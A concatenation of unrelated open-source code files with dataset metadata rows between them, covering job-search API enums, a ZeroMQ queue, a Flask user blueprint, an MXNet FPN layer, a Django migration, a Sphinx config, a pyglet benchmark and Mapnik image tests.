website for job.
APPLICATION_START (int): The job seeker or other entity interacting with the service
began the process or demonstrated the intention of applying for a job.
APPLICATION_FINISH (int): The job seeker or other entity interacting with the service
submitted an application for a job.
APPLICATION_QUICK_SUBMISSION (int): The job seeker or other entity interacting with the service submitted an
application for a job with a single click without entering information.
If a job seeker performs this action, send only this event to the
service. Do not also send ``JobEventType.APPLICATION_START`` or
``JobEventType.APPLICATION_FINISH`` events.
APPLICATION_REDIRECT (int): The job seeker or other entity interacting with the service
performed an action to apply to a job and was redirected to a different
website to complete the application.
APPLICATION_START_FROM_SEARCH (int): The job seeker or other entity interacting with the service began the
process or demonstrated the intention of applying for a job from the
search results page without viewing the details of the job posting.
If sending this event, JobEventType.VIEW event shouldn't be sent.
APPLICATION_REDIRECT_FROM_SEARCH (int): The job seeker, or other entity interacting with the service, performs
an action with a single click from the search results page to apply to a
job (without viewing the details of the job posting), and is redirected
to a different website to complete the application. If a candidate
performs this action, send only this event to the service. Do not also
send ``JobEventType.APPLICATION_START``,
``JobEventType.APPLICATION_FINISH`` or ``JobEventType.VIEW`` events.
APPLICATION_COMPANY_SUBMIT (int): This event should be used when a company submits an application
on behalf of a job seeker. This event is intended for use by staffing
agencies attempting to place candidates.
BOOKMARK (int): The job seeker or other entity interacting with the service demonstrated
an interest in a job by bookmarking or saving it.
NOTIFICATION (int): The job seeker or other entity interacting with the service was
sent a notification, such as an email alert or device notification,
containing one or more jobs listings generated by the service.
HIRED (int): The job seeker or other entity interacting with the service was
employed by the hiring entity (employer). Send this event
only if the job seeker was hired through an application that was
initiated by a search conducted through the Cloud Talent Solution
service.
SENT_CV (int): A recruiter or staffing agency submitted an application on behalf of the
candidate after interacting with the service to identify a suitable job
posting.
INTERVIEW_GRANTED (int): The entity interacting with the service (for example, the job seeker),
was granted an initial interview by the hiring entity (employer). This
event should only be sent if the job seeker was granted an interview as
part of an application that was initiated by a search conducted through /
recommendation provided by the Cloud Talent Solution service.
"""
JOB_EVENT_TYPE_UNSPECIFIED = 0
IMPRESSION = 1
VIEW = 2
VIEW_REDIRECT = 3
APPLICATION_START = 4
APPLICATION_FINISH = 5
APPLICATION_QUICK_SUBMISSION = 6
APPLICATION_REDIRECT = 7
APPLICATION_START_FROM_SEARCH = 8
APPLICATION_REDIRECT_FROM_SEARCH = 9
APPLICATION_COMPANY_SUBMIT = 10
BOOKMARK = 11
NOTIFICATION = 12
HIRED = 13
SENT_CV = 14
INTERVIEW_GRANTED = 15
class Location(object):
class LocationType(enum.IntEnum):
"""
An enum which represents the type of a location.
Attributes:
LOCATION_TYPE_UNSPECIFIED (int): Default value if the type isn't specified.
COUNTRY (int): A country level location.
ADMINISTRATIVE_AREA (int): A state or equivalent level location.
SUB_ADMINISTRATIVE_AREA (int): A county or equivalent level location.
LOCALITY (int): A city or equivalent level location.
POSTAL_CODE (int): A postal code level location.
SUB_LOCALITY (int): A sublocality is a subdivision of a locality, for example a city borough,
ward, or arrondissement. Sublocalities are usually recognized by a local
political authority. For example, Manhattan and Brooklyn are recognized
as boroughs by the City of New York, and are therefore modeled as
sublocalities.
SUB_LOCALITY_1 (int): A district or equivalent level location.
SUB_LOCALITY_2 (int): A smaller district or equivalent level display.
NEIGHBORHOOD (int): A neighborhood level location.
STREET_ADDRESS (int): A street address level location.
"""
LOCATION_TYPE_UNSPECIFIED = 0
COUNTRY = 1
ADMINISTRATIVE_AREA = 2
SUB_ADMINISTRATIVE_AREA = 3
LOCALITY = 4
POSTAL_CODE = 5
SUB_LOCALITY = 6
SUB_LOCALITY_1 = 7
SUB_LOCALITY_2 = 8
NEIGHBORHOOD = 9
STREET_ADDRESS = 10
class LocationFilter(object):
class TelecommutePreference(enum.IntEnum):
"""
Specify whether to include telecommute jobs.
Attributes:
TELECOMMUTE_PREFERENCE_UNSPECIFIED (int): Default value if the telecommute preference isn't specified.
TELECOMMUTE_EXCLUDED (int): Exclude telecommute jobs.
TELECOMMUTE_ALLOWED (int): Allow telecommute jobs.
"""
TELECOMMUTE_PREFERENCE_UNSPECIFIED = 0
TELECOMMUTE_EXCLUDED = 1
TELECOMMUTE_ALLOWED = 2
class Phone(object):
class PhoneType(enum.IntEnum):
"""
Enum that represents the type of the telephone.
Attributes:
PHONE_TYPE_UNSPECIFIED (int): Default value.
LANDLINE (int): A landline.
MOBILE (int): A mobile.
FAX (int): A fax.
PAGER (int): A pager.
TTY_OR_TDD (int): A TTY (test telephone) or TDD (telecommunication device for the deaf).
VOICEMAIL (int): A voicemail.
VIRTUAL (int): A virtual telephone number is a number that can be routed to another
number and managed by the user via Web, SMS, IVR, and so on. It is
associated with a particular person, and may be routed to either a
MOBILE or LANDLINE number. The ``phone usage`` should be set to PERSONAL
for these phone types. Some more information can be found here:
https://en.wikipedia.org/wiki/Personal\_Numbers
VOIP (int): Voice over IP numbers. This includes TSoIP (Telephony Service over IP).
MOBILE_OR_LANDLINE (int): In some regions (e.g. the USA), it is impossible to distinguish between
fixed-line and mobile numbers by looking at the phone number itself.
"""
PHONE_TYPE_UNSPECIFIED = 0
LANDLINE = 1
MOBILE = 2
FAX = 3
PAGER = 4
TTY_OR_TDD = 5
VOICEMAIL = 6
VIRTUAL = 7
VOIP = 8
MOBILE_OR_LANDLINE = 9
class ProfileEvent(object):
class ProfileEventType(enum.IntEnum):
"""
The enum represents types of client events for a candidate profile.
Attributes:
PROFILE_EVENT_TYPE_UNSPECIFIED (int): Default value.
IMPRESSION (int): Send this event when a ``ProfileEvent.profiles`` was sent as a part of a
result set for a CTS API call and was rendered in the end user's UI
(that is, the ``ProfileEvent.recruiter``).
VIEW (int): The VIEW event records the action of a candidate's profile being viewed
by an end user. This is critical to tracking product metrics and should
be sent for every profile VIEW that happens in your system, whether the
event is associated with an API call (for example, a recruiter making a
request for a result set and clicking on a profile) or not (a recruiter
using the system to view profile details without making a request).
For a VIEW events associated with API calls, the
``ClientEvent.request_id`` should be populated. If the VIEW is not
associated with an API call, ``request_id`` should not be populated.
This event requires a valid recruiter and one valid ID in profiles.
BOOKMARK (int): The profile is bookmarked.
"""
PROFILE_EVENT_TYPE_UNSPECIFIED = 0
IMPRESSION = 1
VIEW = 2
BOOKMARK = 3
class Resume(object):
class ResumeType(enum.IntEnum):
"""
The format of a structured resume.
Attributes:
RESUME_TYPE_UNSPECIFIED (int): Default value.
HRXML (int): The profile contents in HR-XML format.
See https://schemas.liquid-technologies.com/hr-xml/2007-04-15/ for more
information about Human Resources XML.
OTHER_RESUME_TYPE (int): Resume type not specified.
"""
RESUME_TYPE_UNSPECIFIED = 0
HRXML = 1
OTHER_RESUME_TYPE = 2
class SearchJobsRequest(object):
class DiversificationLevel(enum.IntEnum):
"""
Controls whether highly similar jobs are returned next to each other in
the search results. Jobs are identified as highly similar based on
their titles, job categories, and locations. Highly similar results are
clustered so that only one representative job of the cluster is
displayed to the job seeker higher up in the results, with the other jobs
being displayed lower down in the results.
Attributes:
DIVERSIFICATION_LEVEL_UNSPECIFIED (int): The diversification level isn't specified.
DISABLED (int): Disables diversification. Jobs that would normally be pushed to the last
page would not have their positions altered. This may result in highly
similar jobs appearing in sequence in the search results.
SIMPLE (int): Default diversifying behavior. The result list is ordered so that
highly similar results are pushed to the end of the last page of search
results.
"""
DIVERSIFICATION_LEVEL_UNSPECIFIED = 0
DISABLED = 1
SIMPLE = 2
class SearchMode(enum.IntEnum):
"""
A string-represented enumeration of the job search mode. The service
operate differently for different modes of service.
Attributes:
SEARCH_MODE_UNSPECIFIED (int): The mode of the search method isn't specified. The default search
behavior is identical to JOB\_SEARCH search behavior.
JOB_SEARCH (int): The job search matches against all jobs, and featured jobs
(jobs with promotionValue > 0) are not specially handled.
FEATURED_JOB_SEARCH (int): The job search matches only against featured jobs (jobs with a
promotionValue > 0). This method doesn't return any jobs having a
promotionValue <= 0. The search results order is determined by the
promotionValue (jobs with a higher promotionValue are returned higher up
in the search results), with relevance being used as a tiebreaker.
"""
SEARCH_MODE_UNSPECIFIED = 0
JOB_SEARCH = 1
FEATURED_JOB_SEARCH = 2
class CustomRankingInfo(object):
class ImportanceLevel(enum.IntEnum):
"""
The importance level for ``CustomRankingInfo.ranking_expression``.
Attributes:
IMPORTANCE_LEVEL_UNSPECIFIED (int): Default value if the importance level isn't specified.
NONE (int): The given ranking expression is of None importance, existing relevance
score (determined by API algorithm) dominates job's final ranking
position.
LOW (int): The given ranking expression is of Low importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
MILD (int): The given ranking expression is of Mild importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
MEDIUM (int): The given ranking expression is of Medium importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
HIGH (int): The given ranking expression is of High importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
EXTREME (int): The given ranking expression is of Extreme importance, and dominates
job's final ranking position with existing relevance
score (determined by API algorithm) ignored.
"""
IMPORTANCE_LEVEL_UNSPECIFIED = 0
NONE = 1
LOW = 2
MILD = 3
MEDIUM = 4
HIGH = 5
EXTREME = 6
class Tenant(object):
class DataUsageType(enum.IntEnum):
"""
Enum that represents how user data owned by the tenant is used.
Attributes:
DATA_USAGE_TYPE_UNSPECIFIED (int): Default value.
AGGREGATED (int): Data owned by this tenant is used to improve search/recommendation
quality across tenants.
ISOLATED (int): Data owned by this tenant is used to improve search/recommendation
quality for this tenant only.
"""
DATA_USAGE_TYPE_UNSPECIFIED = 0
AGGREGATED = 1
ISOLATED = 2
class TimeFilter(object):
class TimeField(enum.IntEnum):
"""
Time fields can be used in TimeFilter.
Attributes:
TIME_FIELD_UNSPECIFIED (int): Default value.
CREATE_TIME (int): Earliest profile create time.
UPDATE_TIME (int): Latest profile update time.
"""
TIME_FIELD_UNSPECIFIED = 0
CREATE_TIME = 1
UPDATE_TIME = 2
| apache-2.0 | -5,653,163,422,906,155,000 | 41.673684 | 120 | 0.669812 | false |
JeremyOT/Toto | toto/messaging.py | 1 | 1817 | from threading import Thread
from traceback import format_exc
import zmq
import logging
class MessageQueue():
def __init__(self):
self.__handlers = {}
self.__zmq_context = zmq.Context()
self.__out_socket = self.__zmq_context.socket(zmq.PUSH)
self.__thread = None
self.__protocol = None
self.__port = 0
self.__interface = None
self.on_recv = None
@property
def port(self):
return self.__port
@property
def interface(self):
return self.__interface
@property
def protocol(self):
return self.__protocol
def address(self):
return '%s://%s:%s' % (protocol, interface, port)
def connect_output(self, *addresses):
for address in addresses:
self.__socket.connect(addresses)
def start_listening(self, on_recv=None, port=0, protocol='tcp', interface='*'):
if self.__thread:
return
if on_recv:
self.on_recv = on_recv
self.__protocol = protocol
self.__interface = interface
def listen():
context = zmq.Context()
socket = context.socket(zmq.PULL)
if port:
self.__port = port
socket.bind(self.address)
else:
self.__port = socket.bind_to_random_port('%s://%s', protocol, interface)
while True:
try:
message = socket.recv()
if on_recv:
on_recv(message)
except Exception as e:
logging.error(format_exc())
self.__thread = None
self.__thread = Thread(target=listen)
self.__thread.daemon = True
self.__thread.start()
def send(self, message):
self.__out_socket.send(message)
_instances = {}
@classmethod
def instance(cls, name='MessageQueue'):
try:
return cls._instances[name]
except:
cls._instances[name] = cls()
return cls._instances[name]
| mit | -1,360,145,696,010,402,300 | 23.226667 | 81 | 0.605394 | false |
allspeak/api.allspeak.eu | web/project/user/views.py | 1 | 6116 | from flask import render_template, Blueprint, request, redirect, url_for, flash, abort, jsonify
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
import os
from .forms import LoginForm, EmailForm, PasswordForm, NewPatientForm
from project import db, app
from project.models import User
user_blueprint = Blueprint('user', __name__)
def can_operate_on(user_from, user_to):
return (user_from.role == User.ADMIN or
user_from.id == user_to.id or
user_to.role == User.PATIENT)
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
################
#### routes ####
################
@user_blueprint.route('/', methods=['GET'])
@login_required
def index():
return redirect(current_user.get_homepage())
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.refresh_login()
db.session.add(user)
db.session.commit()
login_user(user)
flash('Thanks for logging in, {}'.format(current_user.email))
if user.role == User.ADMIN:
redirect_url = url_for('user.view_users')
else:
redirect_url = url_for('user.view_patients')
return redirect(redirect_url)
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
@user_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
flash('Goodbye!', 'info')
return redirect(url_for('user.login'))
@user_blueprint.route('/<int:id>/user_profile')
@login_required
def user_profile(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
return render_template('user_profile.html', user=user)
@user_blueprint.route('/<int:id>/email_change', methods=["GET", "POST"])
@login_required
def user_email_change(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user.email = form.email.data
db.session.add(user)
db.session.commit()
return redirect(url_for('user.user_profile', id=user.id))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('email_change.html', form=form, user=user)
@user_blueprint.route('/<int:id>/password_change', methods=["GET", "POST"])
@login_required
def user_password_change(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('user.user_profile', id=user.id))
return render_template('password_change.html', form=form, user=user)
@user_blueprint.route('/view_patients')
@login_required
def view_patients():
if current_user.role == User.PATIENT:
abort(403)
else:
users = User.query.filter(
User.role == User.PATIENT).order_by(User.id).all()
return render_template('view_patients.html', users=users)
@user_blueprint.route('/view_users')
@login_required
def view_users():
if current_user.role != User.ADMIN:
abort(403)
else:
users = User.query.order_by(User.id).all()
return render_template('view_users.html', users=users)
@user_blueprint.route('/new_patient', methods=['GET', 'POST'])
def new_patient():
form = NewPatientForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(role=User.PATIENT)
db.session.add(new_user)
db.session.commit()
flash('New patient added', 'success')
return redirect(url_for('user.user_profile', id=new_user.id))
except IntegrityError:
db.session.rollback()
flash('An error happened', 'error')
return render_template('new_patient.html', form=form)
@user_blueprint.route('/<int:id>/api_key_reset', methods=["GET", "POST"])
@login_required
def api_key_reset(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
if request.method == 'POST':
try:
user.regenerate_api_key()
db.session.add(user)
db.session.commit()
flash('api key reset completed with success', 'success')
return redirect(url_for('user.user_profile', id=user.id))
except IntegrityError:
db.session.rollback()
flash('An error happened', 'error')
return render_template('api_key_reset.html', user=user)
| mit | -7,856,011,717,960,179,000 | 32.977778 | 95 | 0.600065 | false |
TuSimple/simpledet | models/FPN/assign_layer_fpn.py | 1 | 2616 | """
Assign Layer operator for FPN
author: Yi Jiang, Chenxia Han
"""
import mxnet as mx
import numpy as np
class AssignLayerFPNOperator(mx.operator.CustomOp):
def __init__(self, rcnn_stride, roi_canonical_scale, roi_canonical_level):
super().__init__()
self.rcnn_stride = rcnn_stride
self.roi_canonical_scale = roi_canonical_scale
self.roi_canonical_level = roi_canonical_level
def forward(self, is_train, req, in_data, out_data, aux):
all_rois = in_data[0]
rcnn_stride = self.rcnn_stride
scale0 = self.roi_canonical_scale
lvl0 = self.roi_canonical_level
k_min = np.log2(min(rcnn_stride))
k_max = np.log2(max(rcnn_stride))
rois_area = (all_rois[:, :, 2] - all_rois[:, :, 0] + 1) \
* (all_rois[:, :, 3] - all_rois[:, :, 1] + 1)
scale = mx.nd.sqrt(rois_area)
target_lvls = mx.nd.floor(lvl0 + mx.nd.log2(scale / scale0 + 1e-6))
target_lvls = mx.nd.clip(target_lvls, k_min, k_max)
target_stride = (2 ** target_lvls).astype('uint8')
for i, s in enumerate(rcnn_stride):
lvl_rois = mx.nd.zeros_like(all_rois)
lvl_inds = mx.nd.expand_dims(target_stride == s, axis=2).astype('float32')
lvl_inds = mx.nd.broadcast_like(lvl_inds, lvl_rois)
lvl_rois = mx.nd.where(lvl_inds, all_rois, lvl_rois)
self.assign(out_data[i], req[i], lvl_rois)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 0)
@mx.operator.register('assign_layer_fpn')
class AssignLayerFPNProp(mx.operator.CustomOpProp):
def __init__(self, rcnn_stride, roi_canonical_scale, roi_canonical_level):
super().__init__(need_top_grad=False)
self.rcnn_stride = eval(rcnn_stride)
self.roi_canonical_scale = int(roi_canonical_scale)
self.roi_canonical_level = int(roi_canonical_level)
def list_arguments(self):
return ['rois']
def list_outputs(self):
rois_list = ['rois_s{}'.format(s) for s in self.rcnn_stride]
return rois_list
def infer_shape(self, in_shape):
rpn_rois_shape = in_shape[0]
output_rois_shape = [rpn_rois_shape] * len(self.rcnn_stride)
return [rpn_rois_shape], output_rois_shape
def create_operator(self, ctx, shapes, dtypes):
return AssignLayerFPNOperator(self.rcnn_stride, self.roi_canonical_scale,
self.roi_canonical_level)
def declare_backward_dependency(self, out_grad, in_data, out_data):
return []
| apache-2.0 | 4,098,218,341,457,388,000 | 34.835616 | 86 | 0.606651 | false |
NullRecursive/WebLanches | loja/migrations/0010_auto_20161119_2248.py | 1 | 1216 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('loja', '0009_auto_20161117_2110'),
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('quantidade', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Pedido',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('meus_itens', models.TextField(null=True)),
('usuario', models.ForeignKey(to='loja.Usuario')),
],
),
migrations.AlterField(
model_name='produto',
name='imagem',
field=models.ImageField(upload_to='loja/static/product_images'),
),
migrations.AddField(
model_name='item',
name='id_produto',
field=models.ForeignKey(to='loja.Produto'),
),
]
| mit | -4,721,522,809,531,881,000 | 30.179487 | 114 | 0.536184 | false |
dhamaniasad/readitbetter | docs/conf.py | 1 | 8452 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# readitbetter documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import readitbetter
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'readitbetter'
copyright = u'2015, Asad Dhamani'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = readitbetter.__version__
# The full version, including alpha/beta/rc tags.
release = readitbetter.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'readitbetterdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'readitbetter.tex',
u'readitbetter Documentation',
u'Asad Dhamani', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'readitbetter',
u'readitbetter Documentation',
[u'Asad Dhamani'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'readitbetter',
u'readitbetter Documentation',
u'Asad Dhamani',
'readitbetter',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | -5,454,957,879,573,766,000 | 29.734545 | 76 | 0.706342 | false |
bitcraft/pyglet | contrib/scene2d/examples/los.py | 1 | 1819 | # Lots Of Sprites
"""
Results (us per sprite per frame):
sprites AMD64/mesa AMD64/nv6.6k MacBook Pro AMD/nv7.8k
2000 28.3 29.3 20.6 22.0
after __slots__ removal
sprites AMD64/mesa AMD64/nv6.6k MacBook Pro AMD/nv7.8k
2000
"""
import os
import sys
import random
from pyglet import options
options['debug_gl'] = False
from pyglet.window import Window
from pyglet import clock
from scene2d import *
from pyglet.gl import *
w = Window(600, 600, vsync=False)
img = Image2d.load('examples/noisy/ball.png')
class BouncySprite(Sprite):
dx = dy = 0
def update(self):
# move, check bounds
p = self.properties
self.x += self.dx
self.y += self.dy
if self.x < 0:
self.x = 0
self.dx = -self.dx
elif self.right > 600:
self.right = 600
self.dx = -self.dx
if self.y < 0:
self.y = 0
self.dy = -self.dy
elif self.top > 600:
self.top = 600
self.dy = -self.dy
sprites = list()
numsprites = int(sys.argv[1])
for i in range(numsprites):
x = random.randint(0, w.width - img.width)
y = random.randint(0, w.height - img.height)
s = BouncySprite(x, y, img.width, img.height, img)
s.dx = random.randint(-10, 10)
s.dy = random.randint(-10, 10)
sprites.append(s)
view = FlatView.from_window(w, sprites=sprites)
view.fx, view.fy = w.width / 2, w.height / 2
t = 0
numframes = 0
while 1:
if w.has_exit:
print('FPS:', clock.get_fps())
print('us per sprite:', float(t) / (numsprites * numframes) * 1000000)
break
t += clock.tick()
w.dispatch_events()
for s in sprites:
s.update()
view.clear()
view.draw()
w.flip()
numframes += 1
w.close()
| bsd-3-clause | -3,383,312,969,358,007,000 | 21.182927 | 78 | 0.575041 | false |
maltouzes/pixel-fighters-2D | change_background.py | 1 | 1084 | """ This file is a part of pixel-fighters-2D made by Maltouzes """
def change_background(self, keycode):
""" Change the background """
if keycode[1] == '&':
self.img_back.source = (self.path +
'/background/fight-backgrounds-16.gif')
self.default_y_character = 110
elif keycode[1] == '\xc3\xa9':
self.img_back.source = (self.path +
'/background/fight-backgrounds-07.gif')
self.default_y_character = 130
elif keycode[1] == '"':
self.img_back.source = (self.path +
'/background/fight-backgrounds-01.gif')
self.default_y_character = 40
elif keycode[1] == "'":
self.img_back.source = (self.path +
'/background/fight-backgrounds-04.gif')
self.default_y_character = 105
elif keycode[1] == '(':
self.img_back.source = (self.path +
'/background/fight-backgrounds-15.gif')
self.default_y_character = 135
self.restart_game()
| gpl-3.0 | 5,851,817,295,676,720,000 | 40.692308 | 71 | 0.52952 | false |
manz/python-mapnik | test/python_tests/copy_test.py | 1 | 2951 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, mapnik
from nose.tools import *
from .utilities import execution_path, run_all
def setup():
# All of the paths used are relative, if we run the tests
# from another directory we need to chdir()
os.chdir(execution_path('.'))
def test_image_16_8_simple():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 999)
im.set_pixel(1,0, 5)
im.set_pixel(1,1, 2)
im2 = im.copy(mapnik.ImageType.gray8)
eq_(im2.get_pixel(0,0), 255)
eq_(im2.get_pixel(0,1), 255)
eq_(im2.get_pixel(1,0), 5)
eq_(im2.get_pixel(1,1), 2)
# Cast back!
im = im2.copy(mapnik.ImageType.gray16)
eq_(im.get_pixel(0,0), 255)
eq_(im.get_pixel(0,1), 255)
eq_(im.get_pixel(1,0), 5)
eq_(im.get_pixel(1,1), 2)
def test_image_32f_8_simple():
im = mapnik.Image(2,2,mapnik.ImageType.gray32f)
im.set_pixel(0,0, 120.1234)
im.set_pixel(0,1, -23.4)
im.set_pixel(1,0, 120.6)
im.set_pixel(1,1, 360.2)
im2 = im.copy(mapnik.ImageType.gray8)
eq_(im2.get_pixel(0,0), 120)
eq_(im2.get_pixel(0,1), 0)
eq_(im2.get_pixel(1,0), 120) # Notice this is truncated!
eq_(im2.get_pixel(1,1), 255)
def test_image_offset_and_scale():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
eq_(im.offset, 0.0)
eq_(im.scaling, 1.0)
im.offset = 1.0
im.scaling = 2.0
eq_(im.offset, 1.0)
eq_(im.scaling, 2.0)
def test_image_16_8_scale_and_offset():
im = mapnik.Image(2,2,mapnik.ImageType.gray16)
im.set_pixel(0,0, 256)
im.set_pixel(0,1, 258)
im.set_pixel(1,0, 99999)
im.set_pixel(1,1, 615)
offset = 255
scaling = 3
im2 = im.copy(mapnik.ImageType.gray8, offset, scaling)
eq_(im2.get_pixel(0,0), 0)
eq_(im2.get_pixel(0,1), 1)
eq_(im2.get_pixel(1,0), 255)
eq_(im2.get_pixel(1,1), 120)
# pixels will be a little off due to offsets in reverting!
im3 = im2.copy(mapnik.ImageType.gray16)
eq_(im3.get_pixel(0,0), 255) # Rounding error with ints
eq_(im3.get_pixel(0,1), 258) # same
eq_(im3.get_pixel(1,0), 1020) # The other one was way out of range for our scale/offset
eq_(im3.get_pixel(1,1), 615) # same
def test_image_16_32f_scale_and_offset():
